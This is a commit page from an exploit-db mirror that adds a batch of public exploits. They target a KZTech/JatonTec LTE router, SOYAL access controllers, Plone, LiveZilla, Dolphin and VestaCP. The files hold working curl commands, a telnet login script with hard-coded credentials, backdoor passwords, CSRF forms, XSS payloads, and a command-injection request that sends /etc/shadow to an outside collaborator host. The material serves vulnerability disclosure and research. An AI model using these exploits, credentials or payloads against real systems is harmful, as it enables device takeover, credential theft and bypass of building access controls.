bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-03-20

Browse source 
20 changes to exploits/shellcodes

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path
Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
SOYAL 701 Server 9.0.1 - Insecure Permissions
SOYAL 701 Client 9.0.1 - Insecure Permissions

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
Plone CMS 5.2.3 - 'Title' Stored XSS
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
Boonex Dolphin 7.4.2 - 'width' Stored XSS
Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
Online News Portal 1.0 - 'name' SQL Injection
Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
This commit is contained in:
Offensive Security 2021-03-20 05:01:58 +00:00
parent 1f32ac253c
commit d85f0c8d35
21 changed files with 1197 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
exploits/hardware/dos/49685.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to restart the
device with an HTTP GET request to /goform/RestartDevice page.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$

92
exploits/hardware/remote/49682.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials are never exposed to
the end-user and cannot be changed through any normal operation of
the router.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5637
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
03.02.2021
--
Default web creds:
------------------
admin:admin123
user:user123
Telnet/SSH access:
------------------
admin:root123
===
import telnetlib
host="192.168.1.1"
user="admin"
password="root123"
s=telnetlib.Telnet(host)
s.read_until(b"CPE login: ")
s.write(user.encode('ascii') + b"\n")
s.read_until(b"Password: ")
s.write(password.encode('ascii') + b"\n")
s.write(b"busybox\n")
print(s.read_all().decode('ascii'))
s.mt_interact()
s.close()

53
exploits/hardware/webapps/49676.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03
Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.
Desc: The controller suffers from a cleartext transmission of sensitive
information. This allows interception of the HTTP traffic and disclose
the Master code and the Arming code via a man-in-the-middle attack. An
attacker can obtain these codes to enter into the controller's Programming
mode and bypass physical security controls in place.
Tested on: SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5630
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php
25.01.2021
--
$ curl 'http://192.168.1.1/CtrlParam.htm' \
-H 'Authorization: Basic YWRtaW46' | \
grep -ni -B1 'masterCode\|armCode'
<td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
<td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>
<td>Arming Code (4 Digital) </td>
<td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>

65
exploits/hardware/webapps/49677.html Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03
Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5632
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php
25.01.2021
--
<html>
<body>
<form action="http://192.168.1.1/userset.cgi" method="POST">
<input type="hidden" name="pw" value="test123" />
<input type="hidden" name="pw2" value="test123" />
<input type="submit" value="Forge me!" />
</form>
</body>
</html>
...
<html>
<body>
<form action="http://192.168.1.2/LoginUser.cgi" method="POST">
<input type="hidden" name="pw" value="drugtest123" />
<input type="hidden" name="pw2" value="drugtest123" />
<input type="submit" value="Forge me!" />
</form>
</body>
</html>

83
exploits/hardware/webapps/49680.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authenticated OS command
injection vulnerability. This can be exploited to inject and
execute arbitrary shell commands through the 'pingAddr' HTTP
POST parameter bypassing the injection protection filter.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5635
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
03.02.2021
--
#JT3300V/AM3300V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: kz_userid=admin:311139" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$
#JT3500V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$

89
exploits/hardware/webapps/49681.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authentication bypass
vulnerability. An unauthenticated attacker can disclose sensitive
and clear-text information resulting in authentication bypass by
downloading the configuration of the device and revealing the
admin password.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5636
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
03.02.2021
--
$ curl -s \
-o configtest.zlib \ # Default: config.dat
'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
binwalk -e configtest.zlib ; \
cd _configtest.zlib_extracted ; \
strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
# cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
cd ..
3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

124
exploits/hardware/webapps/49683.txt Normal file
View file

@ -0,0 +1,124 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device has several backdoors and hidden pages that
allow remote code execution, overwriting of the bootrom and
enabling debug mode.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
03.02.2021
--
Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.
Old models (syscmd.asp) password: super1234
Newer models (syscmd.html) password: md5(WAN_MAC+version):
$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
if (*pcVar6 == 0) {
pcVar6 = "6C:AD:EF:00:00:01";
}
memset(acStack280,0,0x100);
sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
...
psMd5Init(auStack112);
psMd5Update(auStack112,local_10,local_c);
psMd5Final(auStack112,uParm1);
return;
...
Another 2 backdoors exist using the websCheckCookie() and specific header strings.
...
iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
if (iVar2 != 0) {
return 0xffffffff;
}
if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
(iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
return 0xffffffff;
...
if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
__n = strlen(__s1);
if (__n == 0) {
snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
system(acStack1560);
websWrite(iParm1,"invalid command!");
goto LAB_0047c3f8;
}
...
Bypass the backdoor password request and enable debug mode from within the web console:
$('#div_check').modal('hide'); <--- syscmd.html
g_password_check_alert.close(); <--- syscmd.asp

72
exploits/hardware/webapps/49684.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to visit the
unprotected /goform/LoadDefaultSettings endpoint and reset the
device to its factory default settings. Once the GET request is
made, the device will reboot with its default settings allowing
the attacker to bypass authentication and take full control of
the system.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5642
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
success
$

70
exploits/hardware/webapps/49686.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the export_settings.cgi file
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
03.02.2021
--
$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat

16
exploits/multiple/webapps/49668.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Plone CMS 5.2.3 - 'Title' Stored XSS
# Date: 18-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://plone.com/
# Software Link: https://github.com/plone/Products.CMFPlone/tags
# Version: 5.2.3
# Tested on: Windows 10
# Reference - https://github.com/plone/Products.CMFPlone/issues/3255
Steps to reproduce the issue:
1- Goto https://localhost/ where Plone 5.2.3 version is installed.
2- Click on "Log in now" and Login as "Manager"
3- Navigate to Manager=>Site Setup=>Site
4- Edit "Site title" field to "xyz<ScRiPt>alert(1)</ScRiPt>"

26
exploits/multiple/webapps/49674.txt Normal file
View file

@ -0,0 +1,26 @@
# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
# Date: 17.03.2021
# Author: Numan Türle
# Vendor Homepage: https://vestacp.com
# Software Link: https://myvestacp.com < 0.9.8-26-43
# Software Link: https://vestacp.com < 0.9.8-26
POST /edit/server/ HTTP/1.1
Host: TARGET:8083
Connection: close
Content-Length: 6633
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: USER_AGENT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Cookie: PHPSESSID=HERE_COOKIE
sec-gpc: 1
token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow

19
exploits/php/webapps/49669.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962
GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

15
exploits/php/webapps/49670.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
# Date: 18-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.boonex.com/
# Software Link: https://www.boonex.com/downloads
# Version: 7.4.2
# Tested on: Windows 10
# Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS
Steps to Reproduce Bug:
1- Login to Admin Panel
2- Goto "Builders" => "Pages Builder"
3- Select any page
4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px</script><script>alert(document.cookie)</script>"

64
exploits/php/webapps/49672.py Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
# Date: 19-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html
# Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
